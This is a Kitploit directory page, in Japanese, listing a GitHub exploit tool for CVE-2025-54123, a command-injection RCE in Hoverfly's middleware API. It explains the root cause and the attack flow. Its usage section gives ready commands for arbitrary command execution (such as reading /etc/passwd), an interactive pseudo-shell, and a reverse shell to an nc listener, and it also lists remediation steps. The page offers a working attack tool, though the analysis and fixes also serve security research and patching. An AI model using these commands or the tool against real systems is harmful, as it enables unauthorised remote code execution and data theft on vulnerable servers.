Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — 認証済みのHoverfly ≤ 1.11.3(CVE-2025-54123)におけるOSコマンドインジェクションを利用したRCEエクスプロイト。認可されたセキュリティテストのための単一コマンド実行、インタラクティブな疑似シェル、リバースシェルをサポートします。 | Kitploit
ツール/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール論文と研究学習と教育レッドチーミングペイロード開発

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

認証済みのHoverfly ≤ 1.11.3(CVE-2025-54123)におけるOSコマンドインジェクションを利用したRCEエクスプロイト。認可されたセキュリティテストのための単一コマンド実行、インタラクティブな疑似シェル、リバースシェルをサポートします。

リポジトリを見る
12ヶ月前未レビュー

CVE-2025-54123 — Hoverfly ミドルウェア API リモートコード実行

認証された RCE: Hoverfly ≤ 1.11.3 における OS コマンドインジェクション

脆弱性の概要

プロパティ値
CVE IDCVE-2025-54123
CVSS スコア9.8 — クリティカル
CVSS ベクトルCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (OS コマンドインジェクション), CWE-20 (不適切な入力検証)
製品Hoverfly — オープンソースの API シミュレーションツール
影響を受けるバージョン1.11.3 までの全バージョン
修正バージョン1.12.0 (パッチコミット)
アドバイザリGHSA-r4h8-hfp2-ggmf

技術的分析

こちらが、ホワイトボックスおよびブラックボックスの視点からのケーススタディと技術的分析の詳細です https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

攻撃対象領域

Hoverfly はシミュレーション設定を管理するための RESTful な管理 API (デフォルトポート 8888) を公開しています。ミドルウェア管理エンドポイント /api/v2/hoverfly/middleware は、外部ミドルウェアプロセスを定義する binary および script フィールドを含む JSON ボディを受け付けます。

根本原因

この脆弱性は、3 つのコードレベルの欠陥 の組み合わせに起因します。

  1. 不十分な入力検証 — middleware.go:93-96: SetBinary() 関数は binary パラメータを検証やサニタイズなしで受け入れるため、攻撃者は任意の実行可能ファイル(例: bash)を指定できます。

  2. 安全でないコマンド実行 — local_middleware.go:14-19: ミドルウェアは exec.Command() を介して実行され、攻撃者が制御する binary および script の値が直接引数として渡されるため、OS コマンドインジェクションが可能になります。

  3. テスト中の即時実行 — hoverfly_service.go:173: API を介してミドルウェアが設定されると、Hoverfly はミドルウェアを実行して即座にテストし、プロキシインターセプト時ではなく設定時にインジェクションされたコマンドをトリガーします。

攻撃フロー

root@kitploit:~
攻撃者                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) 認証
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) ペイロード注入
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) 即時実行
   │    │ → 攻撃者のコマンドが Hoverfly   ││
   │    │   プロセスのユーザーとして実行   ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── コマンド出力がエラーレスポンスに含まれる ──│  (4) 出力の外部送信
   │                                        │

エクスプロイトの使用方法

前提条件

  • Python 3.8+
  • Hoverfly 管理 API の有効な認証情報(デフォルト: admin / 設定可能なパスワード)

インストール

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

動作モード

チェックのみモード

エクスプロイトなしでターゲットの到達可能性と認証を確認します:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -C

単一コマンド実行

ターゲット上で単一の OS コマンドを実行します:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

インタラクティブな擬似シェル

持続的なシェルセッションに入ります:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -i

リバースシェル

リバースシェルをリスナーに送信します:

root@kitploit:~
# ターミナル 1 — リスナーを起動
nc -lvnp 4444

# ターミナル 2 — エクスプロイトを実行
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

プロキシを使用した詳細モード

トラフィックを Burp Suite 経由でルーティングして検査します:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

全フラグ一覧


修復策

パッチの詳細

コミット 17e60a9 による修正では、set middleware API をデフォルトで無効にしています。その後のドキュメントの変更(コミット a9d4da7)により、このエンドポイントを公開することのセキュリティ上の影響がユーザーに認識されます。


参考資料

  • NVD — CVE-2025-54123
  • GitHub Security Advisory — GHSA-r4h8-hfp2-ggmf
  • Vulnerable Code — hoverfly_service.go#L173
  • Vulnerable Code — middleware.go#L93
  • Vulnerable Code — local_middleware.go#L13
  • Patch Commit — 17e60a9

免責事項

このツールは、許可されたセキュリティテストおよび教育研究目的でのみ提供されます。 コンピュータシステムへの不正アクセスは、米国コンピュータ詐欺及び悪用取締法(CFAA)および世界各国の同等の法律に基づき違法です。 作成者は本ソフトウェアの誤用に対する一切の責任を負いません。 所有していないシステムをテストする前に、必ず明示的な書面による許可を得てください。


プロジェクト構成

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # 洗練されたエクスプロイト
│   └── raw_exploit.py      # オリジナルの raw PoC
├── Images/                 # リサーチスクリーンショット
├── Reference/              # 研究用のリファレンスエクスプロイト
├── requirements.txt        # Python 依存関係
└── README.md               # このファイル

著者

Phantom Hat — セキュリティ研究者


この研究は、教育目的の脆弱性ケーススタディの一環として実施されました。

ツールをダウンロード
フラグ説明デフォルト
-u, --urlターゲット Hoverfly URL必須
-U, --username管理者ユーザー名必須
-P, --password管理者パスワード必須
-c, --command実行する OS コマンド—
-C, --checkチェックのみモード(エクスプロイトなし)false
-i, --interactiveインタラクティブな疑似シェルfalse
--revshellリバースシェル LHOST:LPORT—
--proxy127.0.0.1:8080 を経由false
--timeoutリクエストタイムアウト(秒)15
-v, --verbose詳細出力を有効にするfalse
アクション詳細
アップグレードHoverfly を v1.12.0 以降にアップデートしてください。このバージョンでは、set middleware API はデフォルトで無効になっています。
ネットワークセグメンテーションHoverfly 管理 API (ポート 8888) へのアクセスを信頼できるネットワークのみに制限します。
認証Hoverfly 管理 API に強力で一意のパスワードを使用します。
監視/api/v2/hoverfly/middleware への予期しない PUT リクエストを監視します。